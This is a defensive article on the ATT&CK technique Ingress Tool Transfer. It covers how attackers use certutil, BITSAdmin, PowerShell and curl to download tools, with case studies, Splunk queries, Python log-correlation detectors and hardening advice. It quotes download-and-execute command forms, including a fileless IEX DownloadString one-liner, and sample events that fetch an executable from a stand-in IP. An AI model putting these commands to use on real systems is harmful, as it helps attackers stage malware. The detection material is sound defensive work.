T1105 is one of the most widely adopted techniques in the entire ATT&CK framework. Over 470 known threat groups and malware families have been documented using ingress tool transfer. Nearly every intrusion — from commodity ransomware to nation-state espionage — involves downloading additional tools after initial access. If an attacker is on your network, this technique is how they arm themselves.
T1105 is categorized under the Command and Control tactic in MITRE ATT&CK. It describes the transfer of tools and files from an external adversary-controlled system into a compromised environment, either through an established C2 channel or through alternate protocols like HTTP, FTP, or cloud storage services. This is distinct from Lateral Tool Transfer (T1570), which describes moving tools between systems within an already compromised network.
The technique's prevalence is driven by a practical reality of offensive operations: initial access payloads are intentionally small and lightweight. A phishing attachment that drops a 50-line PowerShell stager, a web shell that provides basic command execution, or an exploited vulnerability that yields a reverse shell — none of these carry the full toolkit an attacker needs. The real tools — Cobalt Strike Beacon, Mimikatz, BloodHound, PsExec, ransomware encryptors, custom backdoors — are downloaded after the attacker confirms they have stable access to a live target.
What makes T1105 particularly challenging to defend against is that the tools used for malicious file transfers are the same tools used for legitimate administration. certutil.exe is a certificate management utility. BITSAdmin.exe manages Windows Update downloads. PowerShell is the backbone of Windows automation. curl and wget are standard Linux administration tools. Blocking them outright would cripple IT operations. This is the essence of living-off-the-land (LOTL): the attacker's toolkit is already installed on every system in the environment.
How Ingress Tool Transfer Works
The technique follows a consistent operational pattern across all threat actors, though the specific tools and protocols vary:
Phase 1 — Staging Infrastructure. Before the intrusion begins, the attacker prepares infrastructure to host the tools they will need. This could be a dedicated C2 server, a compromised legitimate website, a cloud storage bucket (S3, Azure Blob, Google Cloud Storage), a code repository (GitHub, GitLab, Bitbucket), a file-sharing platform (Dropbox, OneDrive, Google Drive, Sendspace), or a CDN endpoint. Sophisticated actors use legitimate services because they are trusted by corporate firewalls, proxies, and reputation-based security tools.
Phase 2 — Initial Download. Once the attacker has a foothold on the target system, they execute a command that downloads the next-stage payload from their staging infrastructure. On Windows, this typically uses certutil -urlcache -split -f, PowerShell Invoke-WebRequest, BITSAdmin /transfer, or curl.exe. On Linux and macOS, curl, wget, scp, and tftp serve the same purpose. The downloaded file may be a compiled executable, a DLL, a script (PowerShell, Python, Bash), or an encoded payload that requires decoding before execution.
Phase 3 — Integrity Verification. Advanced threat actors verify that the downloaded payload arrived intact. COSMICENERGY, an OT-targeting malware attributed to Russian interests, was observed using certutil -hashfile to check the SHA-256 hash of downloaded tools before executing them — the same verification step a legitimate administrator would perform.
Phase 4 — Execution and Expansion. The downloaded tools are executed, establishing more capable C2 channels, harvesting credentials, mapping the network, and preparing for the attacker's primary objective — whether that is data exfiltration, ransomware deployment, or persistent espionage access. This phase often triggers additional rounds of T1105 as the attacker downloads specialized tools for each stage of the operation.
Transfer Methods and LOLBins
The LOLBAS (Living Off the Land Binaries and Scripts) project documents over 200 Windows binaries that can be abused for file download and execution. PowerShell dominates, appearing in 71% of LOTL attacks according to recent telemetry. The following are the transfer methods observed with the highest frequency in the wild:
certutil.exe
Originally designed for managing certificates and Certificate Authority configuration, certutil has become one of the most abused LOLBins for file download. The command certutil -urlcache -split -f [URL] [output] downloads a file from a remote URL and saves it locally. Adversaries favor it because it is present on every Windows system, signed by Microsoft, and whitelisted by default in application control policies. The CISA advisory on Medusa ransomware (AA25-071A) specifically documented Medusa actors using certutil to download both CSS and MSI payloads as part of their ransomware deployment chain. Beyond downloading, certutil can also decode Base64-encoded payloads using certutil -decode, making it a two-stage tool — download an encoded payload, then decode it to produce the executable.
PowerShell
PowerShell provides multiple methods for downloading files: Invoke-WebRequest, (New-Object Net.WebClient).DownloadString(), (New-Object Net.WebClient).DownloadFile(), and Start-BitsTransfer. The DownloadString() method is particularly dangerous because it downloads content directly into memory and can be piped to Invoke-Expression (IEX) for execution without ever writing to disk — a fileless execution technique that bypasses file-based scanning. Medusa ransomware actors have been observed using increasingly complex PowerShell evasion techniques, including Base64-encoded commands (-EncodedCommand) with specific execution settings, and routinely delete PowerShell command-line history (T1070.003) to cover their tracks.
BITSAdmin
The Background Intelligent Transfer Service (BITS) is a Windows component designed for asynchronous, prioritized file transfers — primarily used for Windows Update. BITSAdmin.exe is its command-line management tool. Adversaries abuse it with bitsadmin /transfer [jobname] /priority HIGH [URL] [output] to download payloads. BITS transfers run in the background, survive system reboots, and automatically resume after network interruptions — capabilities designed for reliability that also make them resilient C2 delivery channels. QBot, Egregor, Astaroth, and Ramnit malware families have all been documented using BITSAdmin for payload retrieval.
curl and wget (Linux/macOS/Windows)
On Linux and macOS systems, curl and wget are the primary tools for HTTP-based file transfer. Since Windows 10 version 1803, curl.exe ships natively with the operating system, expanding its use in Windows-targeting campaigns. These tools support HTTPS (encrypted transfers), authentication, proxy configuration, and custom headers — providing adversaries with the same flexibility they provide administrators. ESXi-targeting campaigns, including recent ransomware operations against VMware environments, use curl and wget to download encryptors directly onto hypervisor hosts.
Cloud Sync and File-Sharing Abuse
A growing vector for ingress tool transfer is the abuse of cloud storage synchronization. If an attacker compromises a user's Dropbox, OneDrive, or Google Drive credentials, they can upload malicious files through the web portal. If the victim has the desktop sync client installed, those files automatically download to the local machine through the sync agent — a legitimate, encrypted, HTTPS-based transfer that security tools have no reason to flag. GitHub, GitLab, Bitbucket, Sendspace, and Pastebin are also commonly used to host payloads because their domains are trusted by web filters and corporate proxies. APT41's use of free web hosting tools (Cloudflare Workers, InfinityFree, TryCloudflare) for distributing malware payloads since at least August 2024 demonstrates how threat actors continuously seek new trusted platforms for tool delivery.
Windows search-ms Protocol Handler
A newer ingress vector documented by Trellix involves abusing the Windows search-ms protocol handler. Phishing lures trick users into clicking links that invoke search-ms:// URIs, which trigger Windows Explorer to display search results from a remote WebDAV or SMB share. The results appear to be local files, but they are served from the attacker's infrastructure. When the user opens one of these files, the malicious payload is transferred and executed. This technique combines social engineering (T1204 User Execution) with ingress tool transfer in a way that requires no LOLBin abuse and produces minimal forensic artifacts.
Real-World Case Studies
Medusa Ransomware — LOLBin-Driven Tool Delivery at Scale
Medusa ransomware, operating as a ransomware-as-a-service platform since June 2021, has impacted over 500 organizations across critical infrastructure sectors as of January 2026. A joint CISA/FBI/MS-ISAC advisory (AA25-071A, March 2025) documented Medusa's heavy reliance on T1105 through native Windows utilities. Medusa actors use certutil.exe with the -urlcache parameter to download CSS and MSI payloads, PowerShell with encoded commands and escalating evasion techniques for subsequent stage delivery, and Windows Management Instrumentation (WMI) for system enumeration alongside tool transfer operations. The advisory documented the actors systematically deleting PowerShell history after each session. The Lazarus Group subunit Stonefly has been linked to Medusa deployment since late 2025, adding a nation-state espionage dimension to what was previously a purely criminal operation — with custom tools including the Comebacker backdoor, BlindingCan RAT, ChromeStealer, and Mimikatz all transferred using T1105 methods.
Lazarus Group — Supply Chain Meets Ingress Transfer via npm
In April 2025, Lazarus Group expanded its Contagious Interview campaign by publishing 11 new malicious packages on the npm registry. These packages contained malware loaders that, once installed in a developer's environment, downloaded additional payloads from Bitbucket repositories. The campaign targeted developers through fake job interview scenarios where candidates were asked to install npm packages as part of a coding test. Once the package executed, it performed ingress tool transfer by downloading second-stage payloads — including credential stealers and full RATs — from attacker-controlled Bitbucket repositories that appeared to be legitimate development resources. This campaign represents a convergence of supply chain compromise (T1195) and ingress tool transfer, with the npm ecosystem serving as both the initial access vector and the delivery mechanism.
INC Ransomware — From LOLBin to Full Encryption
A forensic investigation published in 2024 documented an INC Ransomware intrusion that demonstrated the full LOLBin-to-encryption pipeline. After gaining initial access, the attackers used certutil.exe and BITSAdmin.exe to download their toolset — including network scanning utilities, credential harvesting tools, and the ransomware binary itself. The investigation showed the complete progression: LOLBin-based tool transfer, followed by reconnaissance, credential theft, lateral movement, data staging, and finally ransomware deployment. Each stage involved additional rounds of T1105 as specialized tools were downloaded for specific purposes.
Gamaredon — LNK-Based Tool Transfer Chains
Gamaredon, the Russian-linked threat group that has sustained offensive operations against Ukraine since the 2022 invasion, uses LNK files as the initial vector for ingress tool transfer. In campaigns documented by Cisco Talos in March 2025, phishing emails deliver LNK files that execute PowerShell commands to download the Remcos backdoor from attacker infrastructure. The download chain uses multiple stages: the LNK executes PowerShell, PowerShell downloads an intermediate loader, and the loader fetches the final Remcos payload. Each stage uses standard HTTP/S transfers through Invoke-WebRequest, making each individual transfer look like normal web traffic.
COSMICENERGY — Tool Transfer with Hash Verification in OT Environments
COSMICENERGY, an OT-targeting malware potentially linked to Russian emergency response exercises, demonstrated an unusual level of operational discipline around ingress tool transfer. After downloading tools onto compromised systems in operational technology environments, the malware verified payload integrity by computing SHA-256 hashes using certutil -hashfile — the same verification process a systems engineer would use when deploying legitimate software. This highlights that T1105 in critical infrastructure environments can follow the same patterns as legitimate change management processes, making detection based on tool behavior alone insufficient.
Detection Strategies
Detecting ingress tool transfer requires correlating process execution, command-line arguments, network connections, and file system activity. The challenge is that each individual indicator — a certutil execution, an outbound HTTPS connection, a new file appearing in a temp directory — is entirely normal in isolation. Detection must rely on the combination and context of these events.
Key Event IDs and Telemetry Sources
| Source | Event | Detection Value |
|---|---|---|
| Sysmon 1 | Process Creation | Captures full command lines for LOLBins. Look for certutil with -urlcache and -split, bitsadmin with /transfer or /download, PowerShell with DownloadString, DownloadFile, or Invoke-WebRequest. |
| Sysmon 3 | Network Connection | Maps which process made which outbound connection. Flag system utilities (certutil, bitsadmin, mshta) making connections to external IP addresses or non-corporate domains. |
| Sysmon 11 | File Creation | Identifies new files written to disk, including their path. Executable files or scripts appearing in %TEMP%, %APPDATA%, C:\ProgramData, or user profile directories after LOLBin execution are high-fidelity indicators. |
| Sysmon 15 | FileCreateStreamHash | Captures alternate data streams (ADS) and Zone.Identifier marks that indicate files downloaded from the internet. Useful for identifying downloaded payloads even after they are renamed. |
| Win 4688 | Process Creation (Security Log) | With command-line auditing enabled, provides the same LOLBin visibility as Sysmon 1. Enable via Group Policy: "Include command line in process creation events." |
| Proxy / Firewall Logs | HTTP/S Requests | URL categorization, file download events, and user-agent strings from LOLBins. certutil and BITSAdmin use distinctive user-agent strings that can be flagged. |
SIEM Detection Queries
certutil Download Detection (Splunk) — identifies certutil.exe execution with command-line parameters associated with file download:
index=sysmon EventCode=1 process_name="certutil.exe" | where match(CommandLine, "(?i)(urlcache|split|decode|encode|verifyctl)") | where match(CommandLine, "(?i)(http|ftp|\\\\)") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(CommandLine) as commands by src_ip user parent_process_name | sort -count
BITSAdmin and PowerShell Download Detection (Splunk) — identifies download activity through the two other most commonly abused Windows tools:
index=sysmon EventCode=1 (process_name="bitsadmin.exe" AND (CommandLine="*download*" OR CommandLine="*transfer*")) OR (process_name="powershell.exe" AND (CommandLine="*DownloadString*" OR CommandLine="*DownloadFile*" OR CommandLine="*Invoke-WebRequest*" OR CommandLine="*Start-BitsTransfer*" OR CommandLine="*IEX*")) | stats count values(CommandLine) as commands by src_ip user process_name parent_process_name | sort -count
Executable File Creation in Suspicious Directories (Splunk) — identifies executable or script files written to common staging locations, correlated with LOLBin process activity:
index=sysmon EventCode=11 (TargetFilename="*.exe" OR TargetFilename="*.dll" OR TargetFilename="*.ps1" OR TargetFilename="*.bat" OR TargetFilename="*.msi" OR TargetFilename="*.hta") (TargetFilename="*\\Temp\\*" OR TargetFilename="*\\AppData\\*" OR TargetFilename="*\\ProgramData\\*" OR TargetFilename="*\\Downloads\\*") | join type=inner src_ip [search index=sysmon EventCode=1 (process_name="certutil.exe" OR process_name="bitsadmin.exe" OR process_name="powershell.exe" OR process_name="curl.exe") | stats latest(_time) as exec_time by src_ip process_name] | where _time >= exec_time AND _time - exec_time < 300 | table _time src_ip user process_name TargetFilename
Command-line logging is the single most important telemetry source for detecting T1105. Without it, you can see that certutil.exe or powershell.exe ran, but not what it did. Enable Sysmon with a configuration that captures Event IDs 1, 3, 11, and 15 at minimum, and ensure Windows Security Event 4688 has command-line auditing enabled via Group Policy.
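The same three analytics, expressed as a small Python correlation routine over Sysmon-style events, as an added example that is not part of the original page or of any vendor's detection content. It flags LOLBin download command lines (Event 1), then file writes of executable types into staging directories on the same host within 300 seconds of such a command (Event 11), and enriches each staged file with the HostUrl from its Zone.Identifier stream when Sysmon 15 recorded one. The regexes, the epoch-second UtcTime values, and the sample events are all assumptions constructed for the example; real Sysmon timestamps are strings and field names vary by forwarder.

```python
import re

# Assumed command-line patterns per binary (not from the page); case-insensitive.
DOWNLOAD_PATTERNS = {
    "certutil.exe": re.compile(r"-(urlcache|split|decode|encode|verifyctl)\b", re.I),
    "bitsadmin.exe": re.compile(r"/(transfer|addfile)\b", re.I),
    "powershell.exe": re.compile(
        r"(DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer|\biwr\b|\biex\b)", re.I),
}
REMOTE_SOURCE = re.compile(r"(https?://|ftp://|\\\\)", re.I)   # URL or UNC path
DOWNLOAD_PATTERNS["curl.exe"] = REMOTE_SOURCE
STAGING_DIRS = re.compile(r"\\(Temp|AppData|ProgramData|Downloads)\\", re.I)
PAYLOAD_EXT = re.compile(r"\.(exe|dll|ps1|bat|msi|hta)$", re.I)
WINDOW_SECONDS = 300   # same window as the Splunk join


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def flag_download_command(event):
    """True when a Sysmon Event 1 record looks like a LOLBin download."""
    name = image_name(event["Image"])
    pattern = DOWNLOAD_PATTERNS.get(name)
    if pattern is None:
        return False
    cmd = event["CommandLine"]
    if name == "certutil.exe":
        # certutil has many benign uses (-hashfile, CA admin); require a remote source too.
        return bool(pattern.search(cmd) and REMOTE_SOURCE.search(cmd))
    return bool(pattern.search(cmd))


def parse_zone_identifier(contents):
    """Parse the [ZoneTransfer] key=value text Sysmon 15 records for a Zone.Identifier stream."""
    fields = {}
    for line in contents.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def correlate(events):
    """Emit alerts for download commands and for staged payloads written soon after them."""
    events = sorted(events, key=lambda e: e["UtcTime"])
    # Pass 1: collect mark-of-the-web origins, keyed by host and file path.
    motw = {}
    for e in events:
        if e["EventID"] == 15 and e["TargetFilename"].lower().endswith(":zone.identifier"):
            path = e["TargetFilename"].rsplit(":", 1)[0].lower()
            motw[(e["Computer"], path)] = parse_zone_identifier(e.get("Contents", ""))
    # Pass 2: flag download commands, then payload writes to staging dirs inside the window.
    alerts, last_exec = [], {}
    for e in events:
        host = e["Computer"]
        if e["EventID"] == 1 and flag_download_command(e):
            last_exec[host] = (e["UtcTime"], e["Image"])
            alerts.append({"type": "lolbin_download", "host": host,
                           "image": e["Image"], "cmd": e["CommandLine"]})
        elif e["EventID"] == 11:
            path = e["TargetFilename"]
            if not (PAYLOAD_EXT.search(path) and STAGING_DIRS.search(path)):
                continue
            seen = last_exec.get(host)
            if seen and 0 <= e["UtcTime"] - seen[0] < WINDOW_SECONDS:
                origin = motw.get((host, path.lower()), {}).get("HostUrl")
                alerts.append({"type": "staged_payload", "host": host, "file": path,
                               "downloader": seen[1], "source_url": origin})
    return alerts


# Constructed sample telemetry (UtcTime as epoch seconds for brevity); not real events.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": 1000, "Computer": "WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Invoke-WebRequest http://203.0.113.10/t.exe -OutFile C:\Users\bob\AppData\Local\Temp\t.exe"},
    {"EventID": 11, "UtcTime": 1002, "Computer": "WS01",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\t.exe"},
    {"EventID": 15, "UtcTime": 1002, "Computer": "WS01",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\t.exe:Zone.Identifier",
     "Contents": "[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=http://203.0.113.10/t.exe"},
    {"EventID": 1, "UtcTime": 2000, "Computer": "WS02",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\installers\agent.msi SHA256"},   # benign use, no alert
    {"EventID": 11, "UtcTime": 2001, "Computer": "WS02",
     "TargetFilename": r"C:\Users\alice\Downloads\agent.exe"},   # no LOLBin download preceded it
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Two design points carry over from the Splunk versions: certutil is only flagged when the command line also names a remote source, because -hashfile and certificate-store operations are everyday administration, and the file-creation rule only fires when the write lands after the download command, not merely within 300 seconds of it in either direction.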
Known Threat Actors
| Threat Actor | Attribution | Ingress Tool Transfer Usage |
|---|---|---|
| Lazarus Group | North Korea | Malicious npm packages with Bitbucket-hosted payloads, Comebacker backdoor delivery in Medusa ransomware operations, LOLBin abuse documented in "LolZarus" campaign. |
| APT41 (Brass Typhoon) | China | Free web hosting tools (Cloudflare Workers, InfinityFree) for VOLDEMORT, DUSTTRAP, and TOUGHPROGRESS payload distribution since August 2024. |
| Volt Typhoon | China | Living-off-the-land file transfers using PowerShell and native Windows utilities. Minimal external tool introduction to maintain stealth in critical infrastructure. |
| Gamaredon | Russia | LNK-to-PowerShell-to-Remcos multi-stage download chains targeting Ukrainian organizations. Sustained high-volume operations since 2022. |
| Medusa RaaS | Financially motivated | certutil and PowerShell for payload staging, RMM tool abuse (SimpleHelp, GoAnywhere MFT) for persistence. 500+ victims as of January 2026. |
| INDRIK SPIDER | Russia | Evolution from Dridex wire fraud through BitPaymer, WastedLocker, and LOCKBIT deployment — all stages using LOLBin-based tool transfer. |
| APT29 (Midnight Blizzard) | Russia (SVR) | FoggyWeb and SUNBURST backdoor delivery through compromised supply chains. Post-exploitation tools transferred via C2 channels over HTTPS. |
| BlackTech | China | BendyBear shellcode delivery and custom backdoor installation via router firmware modification and LOLBin downloads. |
| Turla | Russia (FSB) | LightNeuron mail-based tool delivery, PowerShell-based secondary payload staging in Operation Ghost campaigns. |
| OilRig (APT34) | Iran | Steganography-based payload encoding combined with HTTP/S download for covert tool transfer to telecom targets. |
T1105 appears in the operational playbooks of virtually every ransomware group (Medusa, LockBit, Black Basta, Conti, MAZE, INC Ransom, Egregor), commodity malware family (QBot, Emotet, RedLine, Agent Tesla, Remcos), and red team framework (Cobalt Strike, Sliver, Havoc, Brute Ratel, Metasploit). It is the connective tissue between initial access and every subsequent phase of an intrusion.
Defensive Recommendations
You cannot block ingress tool transfer by blocking the tools — they are legitimate operating system components. Defense requires layered visibility, behavioral analytics, and egress controls that make it harder for downloaded tools to reach attacker infrastructure.
- Enable comprehensive command-line logging: Deploy Sysmon with a configuration capturing Event IDs 1 (process creation), 3 (network connection), 11 (file creation), and 15 (file stream creation). Enable Windows Security Event 4688 with command-line auditing. Without command-line visibility, every LOLBin detection analytic is blind. This is the single highest-priority control for T1105 detection.
- Block outbound network connections for LOLBins: Use the Windows host firewall (or equivalent endpoint firewall) to block outbound network connections for commonly abused binaries: certutil.exe, mshta.exe, regsvr32.exe, rundll32.exe, and certreq.exe. These binaries rarely need internet access in production environments. This is a high-impact, low-effort control that blocks several T1105 vectors without impacting normal operations.
- Implement application control policies: Use Windows Defender Application Control (WDAC) or AppLocker to restrict which executables can run in user-writable directories (%TEMP%, %APPDATA%, Downloads). This does not prevent the download itself but blocks the execution of downloaded payloads — breaking the kill chain between transfer and impact.
- Deploy web proxy with SSL inspection and categorization: Route all outbound HTTP/S traffic through an inspecting proxy. Block downloads of executable file types (.exe, .dll, .msi, .hta, .ps1, .bat, .cmd, .vbs) from uncategorized or newly registered domains. Monitor for downloads from cloud storage, code repositories, and file-sharing platforms that do not match expected business use.
- Restrict PowerShell execution: Enable PowerShell Constrained Language Mode on all endpoints. Deploy PowerShell Script Block Logging and Module Logging. Consider disabling PowerShell v2 (which lacks logging capabilities) via Disable-WindowsOptionalFeature -FeatureName MicrosoftWindowsPowerShellV2. Implement JEA (Just Enough Administration) for administrative tasks that require PowerShell.
- Monitor BITS activity: BITS jobs persist across reboots and can be configured to run on a schedule. Monitor for unexpected BITS job creation using Get-BitsTransfer -AllUsers or by auditing the BITS event log (Microsoft-Windows-Bits-Client/Operational). Alert on BITS jobs downloading from external URLs, especially when created by non-standard parent processes.
- Enforce DNS filtering and egress restrictions: Block access to known malicious domains, newly registered domains (less than 30 days old), and dynamic DNS providers. Restrict outbound DNS to designated recursive resolvers only. For critical servers and OT systems, implement strict egress allowlists that limit outbound connections to only the specific destinations required for operations.
- Validate defenses through simulation: Use Atomic Red Team's T1105 test suite, which includes 20+ atomic tests covering certutil, BITSAdmin, PowerShell, curl, scp, and other transfer methods. Run each test and verify that your detection analytics generate the expected alerts. Pay particular attention to fileless download methods (IEX(New-Object Net.WebClient).DownloadString()) which bypass file-based detection entirely.
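The proxy-side controls above (executable downloads from uncategorized or newly registered domains, and the distinctive user-agent strings noted in the telemetry table) can be checked against proxy logs before they are turned into blocking policy. The following is an added example, not code from the page or from any proxy vendor: it reads constructed CSV proxy records, applies those rules, and also goes slightly beyond the text by flagging executable downloads from bare IP literals. The log format, the category labels, the domain registration dates, and the user-agent prefixes ("Microsoft-CryptoAPI/" for certutil, "Microsoft BITS/" for BITS) are assumptions; confirm the prefixes against what your own proxy records for those tools.

```python
import csv
import ipaddress
from datetime import datetime, timedelta, timezone
from io import StringIO
from urllib.parse import urlparse

EXEC_EXT = (".exe", ".dll", ".msi", ".hta", ".ps1", ".bat", ".cmd", ".vbs")
# Assumed user-agent prefixes for certutil (CryptoAPI) and BITS; verify against your own data.
LOLBIN_UA_PREFIXES = ("Microsoft-CryptoAPI/", "Microsoft BITS/")
# Assumed category labels; map these to whatever your proxy emits.
RISKY_CATEGORIES = {"uncategorized", "newly-registered", "file-sharing", "code-repository"}
NEW_DOMAIN_DAYS = 30


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def evaluate(rec, registered_on):
    """Return policy findings for one proxy record; an empty list means nothing to flag."""
    findings = []
    ua = rec["user_agent"]
    if ua.startswith(LOLBIN_UA_PREFIXES):
        findings.append(f"lolbin-user-agent:{ua}")
    url = urlparse(rec["url"])
    host = url.hostname or ""
    if url.path.lower().endswith(EXEC_EXT):
        if is_ip_literal(host):
            findings.append("executable-from-ip-literal")
        if rec["category"] in RISKY_CATEGORIES:
            findings.append(f"executable-from-{rec['category']}")
        registered = registered_on.get(host)
        seen = datetime.fromisoformat(rec["timestamp"].replace("Z", "+00:00"))
        if registered is not None and seen - registered < timedelta(days=NEW_DOMAIN_DAYS):
            findings.append("executable-from-new-domain")
    return findings


def analyze(log_text, registered_on):
    """Run evaluate() over CSV proxy records; return (src_ip, url, findings) for each hit."""
    results = []
    for rec in csv.DictReader(StringIO(log_text)):
        findings = evaluate(rec, registered_on)
        if findings:
            results.append((rec["src_ip"], rec["url"], findings))
    return results


# Constructed sample proxy log (CSV) and registration dates; not real traffic or WHOIS data.
SAMPLE_LOG = """timestamp,src_ip,user,method,url,status,bytes,user_agent,category
2025-03-01T10:00:01Z,10.0.0.5,bob,GET,http://203.0.113.10/t.exe,200,512000,Microsoft-CryptoAPI/10.0,uncategorized
2025-03-01T10:05:12Z,10.0.0.7,alice,GET,https://download.example-vendor.com/agent.msi,200,8400000,Mozilla/5.0,software-updates
2025-03-01T10:09:40Z,10.0.0.9,carol,GET,https://files.newly-made.example/setup.exe,200,230000,Microsoft BITS/7.8,uncategorized
2025-03-01T10:12:03Z,10.0.0.5,bob,GET,https://www.example.com/index.html,200,4200,Mozilla/5.0,business
"""
SAMPLE_REGISTRATIONS = {
    "download.example-vendor.com": datetime(2015, 1, 1, tzinfo=timezone.utc),
    "files.newly-made.example": datetime(2025, 2, 20, tzinfo=timezone.utc),
}

if __name__ == "__main__":
    for src_ip, url, findings in analyze(SAMPLE_LOG, SAMPLE_REGISTRATIONS):
        print(src_ip, url, ", ".join(findings))
```

The signed vendor MSI from a long-registered domain in the sample produces no finding, which is the behaviour the proxy recommendation needs: the rules target executable downloads from unknown or young infrastructure and from tools that do not normally fetch binaries, not executable downloads as such.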
MITRE ATT&CK Mapping
| Field | Value |
|---|---|
| Technique ID | T1105 |
| Technique Name | Ingress Tool Transfer |
| Tactics | Command and Control |
| Platforms | Windows, Linux, macOS, Network Devices, ESXi |
| Sub-Techniques | None (T1105 has no sub-techniques) |
| Data Sources | File (Creation), Network Traffic (Content, Flow), Process (Creation) |
| Related Techniques | T1570 Lateral Tool Transfer, T1059 Command and Scripting Interpreter, T1218 System Binary Proxy Execution |
| MITRE Reference | attack.mitre.org/techniques/T1105 |
Sources and References
- MITRE ATT&CK — T1105 Ingress Tool Transfer: attack.mitre.org
- CISA/FBI/MS-ISAC — #StopRansomware: Medusa Ransomware (AA25-071A, March 2025): cisa.gov
- Red Canary — 2025 Threat Detection Report, Ingress Tool Transfer: redcanary.com
- Atomic Red Team — T1105 Atomic Tests: atomicredteam.io
- Cisco Talos — Gamaredon LNK Campaign (March 2025): blog.talosintelligence.com
- LOLBAS Project — Living Off the Land Binaries, Scripts and Libraries: lolbas-project.github.io
- Symantec — Lazarus Group Medusa Ransomware Operations (2026): broadcom.com